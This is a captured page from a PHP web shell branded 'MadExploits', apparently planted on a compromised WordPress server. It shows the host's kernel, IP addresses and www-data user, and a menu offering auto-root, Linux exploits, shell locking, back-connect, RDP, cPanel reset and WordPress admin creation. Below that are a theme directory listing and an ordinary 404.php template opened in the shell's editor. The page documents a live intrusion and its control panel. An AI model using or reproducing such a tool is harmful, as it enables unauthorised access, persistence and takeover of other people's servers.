Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
leadnepal /
wp-content /
themes /
ultra /
[ HOME SHELL ]
Name
Size
Permission
Action
breadcrumbs
[ DIR ]
drwxr-xr-x
demo
[ DIR ]
drwxr-xr-x
font-awesome
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
loops
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
slider
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
404.php
1.92
KB
-rwxr-xr-x
archive.php
965
B
-rwxr-xr-x
changelog.txt
14
KB
-rwxr-xr-x
comments.php
1.81
KB
-rwxr-xr-x
content-none.php
1.15
KB
-rwxr-xr-x
content-page.php
963
B
-rwxr-xr-x
content-search.php
828
B
-rwxr-xr-x
content-single.php
949
B
-rwxr-xr-x
content.php
1.58
KB
-rwxr-xr-x
footer.php
14.07
KB
-rwxr-xr-x
functions.php
21.64
KB
-rwxr-xr-x
header.php
2.68
KB
-rwxr-xr-x
home-panels.php
765
B
-rwxr-xr-x
index.php
1.26
KB
-rwxr-xr-x
license.txt
14.69
KB
-rwxr-xr-x
page.php
1.23
KB
-rwxr-xr-x
readme.txt
8.42
KB
-rwxr-xr-x
screenshot.png
286.39
KB
-rwxr-xr-x
search.php
1.34
KB
-rwxr-xr-x
searchform.php
739
B
-rwxr-xr-x
sidebar.php
513
B
-rwxr-xr-x
single.php
1.51
KB
-rwxr-xr-x
style.css
114.38
KB
-rwxr-xr-x
wpml-config.xml
548
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 404.php
<?php /** * The template for displaying 404 pages (not found). * * @link https://codex.wordpress.org/Creating_an_Error_404_Page * * @package ultra * @since ultra 0.9 * @license GPL 2.0 */ get_header(); ?> <?php if ( siteorigin_page_setting( 'page_title' ) ) : ?> <header class="page-header"> <div class="container"> <h1 class="page-title"><?php echo wp_kses_post( siteorigin_setting( 'text_404_heading' ) ); ?></h1><?php ultra_breadcrumb(); ?> </div><!-- .container --> </header><!-- .page-header --> <?php endif; ?> <div class="container"> <div id="primary" class="content-area"> <main id="main" class="site-main"> <section class="error-404 not-found"> <div class="page-content"> <p><?php echo wp_kses_post( siteorigin_setting( 'text_404_copy' ) ); ?></p> <?php get_search_form(); ?> <?php the_widget( 'WP_Widget_Recent_Posts' ); ?> <?php if ( ultra_categorized_blog() ) : // Only show the widget if site has multiple categories. ?> <div class="widget widget_categories"> <h2 class="widget-title"><?php esc_html_e( 'Most Used Categories', 'ultra' ); ?></h2> <ul> <?php wp_list_categories( array( 'orderby' => 'count', 'order' => 'DESC', 'show_count' => 1, 'title_li' => '', 'number' => 10, ) ); ?> </ul> </div><!-- .widget --> <?php endif; ?> <?php /* translators: %1$s: smiley */ $archive_content = '<p>' . sprintf( esc_html__( 'Try looking in the monthly archives. %1$s', 'ultra' ), convert_smilies( ':)' ) ) . '</p>'; the_widget( 'WP_Widget_Archives', 'dropdown=1', "after_title=</h2>$archive_content" ); ?> <?php the_widget( 'WP_Widget_Tag_Cloud' ); ?> </div><!-- .page-content --> </section><!-- .error-404 --> </main><!-- #main --> </div><!-- #primary --> <?php get_sidebar(); ?> <?php get_footer(); ?>
Close